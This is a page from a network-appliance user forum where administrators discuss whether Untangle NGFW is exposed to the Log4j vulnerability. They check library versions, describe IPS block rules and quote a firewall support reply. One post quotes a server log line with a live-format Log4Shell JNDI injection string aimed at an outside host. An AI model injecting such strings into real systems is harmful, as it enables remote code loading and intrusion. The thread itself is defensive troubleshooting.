Page 2 of 7 FirstFirst 1234 ... LastLast
Results 11 to 20 of 63
  1. #11
    Untangler
    Join Date
    May 2008
    Posts
    548

    Default

    We will probably get banned for asking hard questions. LOL

  2. #12
    Untangler
    Join Date
    Nov 2017
    Posts
    45

    Default

    Ha! No kidding.

    Frankly I could care less. Untangle can focus on selling $50 home user licenses and I'll move onto a platform that actually takes business critical infrastructure issues seriously.

  3. #13
    Untangle Ninja sky-knight's Avatar
    Join Date
    Apr 2008
    Location
    Phoenix, AZ
    Posts
    26,498

    Default

    Code:
    [root @ untangle] ~ # find / -name *log4j*
    /usr/share/java/uvm/log4j-1.2.16.jar
    /usr/share/java/uvm/slf4j-log4j12-1.4.3.jar
    /usr/share/untangle/web/quarantine/WEB-INF/lib/slf4j-log4j12-1.4.3.jar
    /usr/share/untangle/conf/log4j.xml
    Vulnerable versions are 2.0 to 2.14.1. So my findings here echo Angstroli's. It seems the version Untangle uses is too old for this particular exploit.
    Rob Sandling, BS:SWE, MCP
    NexgenAppliances.com
    Phone: 866-794-8879 x201
    Email: support@nexgenappliances.com

  4. #14
    Untangler
    Join Date
    Nov 2017
    Posts
    45

    Default

    Thanks Rob. This is my assumption as well based on looking at it.

    I don't claim to be an expert at the inner workings though, so can you clarify, would it still be possible for one of the apps to be utilizing a different version inside a container? Searching wouldn't always work unless all applications were setup and installed with their respective dependencies right?
    donhwyo likes this.

  5. #15
    Untangler
    Join Date
    May 2008
    Posts
    548

    Default

    Well it seems because they use old versions of software. Is it really safe or are the older versions just not tested?

    A new way to be secure "just use the old stuff". Nobody would think of testing those versions. LOL

  6. #16
    Untangle Ninja sky-knight's Avatar
    Join Date
    Apr 2008
    Location
    Phoenix, AZ
    Posts
    26,498

    Default

    Quote Originally Posted by MNTech68 View Post
    Thanks Rob. This is my assumption as well based on looking at it.

    I don't claim to be an expert at the inner workings though, so can you clarify, would it still be possible for one of the apps to be utilizing a different version inside a container? Searching wouldn't always work unless all applications were setup and installed with their respective dependencies right?
    I'm not a wizard of Java myself, so I can't be completely certain. But I do know that NGFW at least tries to use as much bare Debian as it can get away with. Debian is pretty solid on its own, so I don't typically worry about this sort of thing. And yes, it uses a lot of OLD but well maintained software. Stable means old after all. The curve ball lies in when Untangle fails to actually push out Debian's provided patches. Which, it often does.

    Overall, I still find NGFW to be better in the long run than anything else that lives in this space. Sonicwall, Fortigate, etc... Those things are all proprietary firmware that we cannot audit ourselves. Untangle NGFW has HUGE holes in it relative to what's ideal, but when compared to what's next to it on the shelf it's generally the best option.

    But in this specific case, my gut tells me to be more concerned about the Command Center than NGFW. After all, the only way this log4j problem becomes an issue is if the https service is exposed on the WAN. This shouldn't ever be true! I haven't been able to exploit the LAN side yet in my testing.

    I was able to exploit my Unifi controller, so I'm glad that's been patched at least.

    I was able to read through the configuration .xml file that I found earlier, and there are no references to the environment variable that exposes log4j's issue via the runtime. And the runtime itself is young enough to assume a good setting. Which is further evidence that NGFW isn't actually vulnerable.
    Last edited by sky-knight; 12-12-2021 at 01:30 PM.
    Rob Sandling, BS:SWE, MCP
    NexgenAppliances.com
    Phone: 866-794-8879 x201
    Email: support@nexgenappliances.com

  7. #17
    Untangler
    Join Date
    May 2016
    Posts
    51

    Default

    Quote Originally Posted by sky-knight View Post
    Yep, I've got a rule that simply says, if message contains log4j then block.
    I have the same rule, basically if Msg contains log4j, then Enable Block. When I search for log4j signatures, they all say Rule Action - Block.

    It doesn't seem to be working though as I just saw someone try against my webserver. Just for my amusement I pause the session for 5 seconds with modsecurity to hang up their script and then send them a 402.

    x.x.x.x 45.83.64.53 - - [12/Dec/2021:21:07:53 -0700] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 402 517 "${jndi:dns://45.83.64.1/securityscan-http80}" "${jndi:dns://45.83.64.1/securityscan-http80}"

    Looking at my Intrusion Prevention reports, I don't even see 45.83.64.53 in All Events? It's like it's bypassing Intrusion Prevention? Guess I could open a ticket.

  8. #18
    Untangle Ninja sky-knight's Avatar
    Join Date
    Apr 2008
    Location
    Phoenix, AZ
    Posts
    26,498

    Default

    The problem is, you'll have to terminate SSL on Untangle for it to see the web request. These signature matches won't do much good with HTTPs in the mix.

    I assume your HTTP site is just a redirect?
    Rob Sandling, BS:SWE, MCP
    NexgenAppliances.com
    Phone: 866-794-8879 x201
    Email: support@nexgenappliances.com

  9. #19
    Untangler
    Join Date
    May 2016
    Posts
    51

    Default

    No, sadly it's still just an old weather station site on http. I know... I try to mitigate as much as I can by running modsecurity in front of it.
    Last edited by sspeed; 12-12-2021 at 10:07 PM.

  10. #20
    Newbie
    Join Date
    Oct 2018
    Posts
    8

    Default

    official response to my support ticket:
    The NGFW is unaffected by the Log4J vulnerability. We use an older, patched version that is not subject to the vulnerability.
    junglechuck likes this.

Page 2 of 7 FirstFirst 1234 ... LastLast

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

SEO by vBSEO 3.6.0 PL2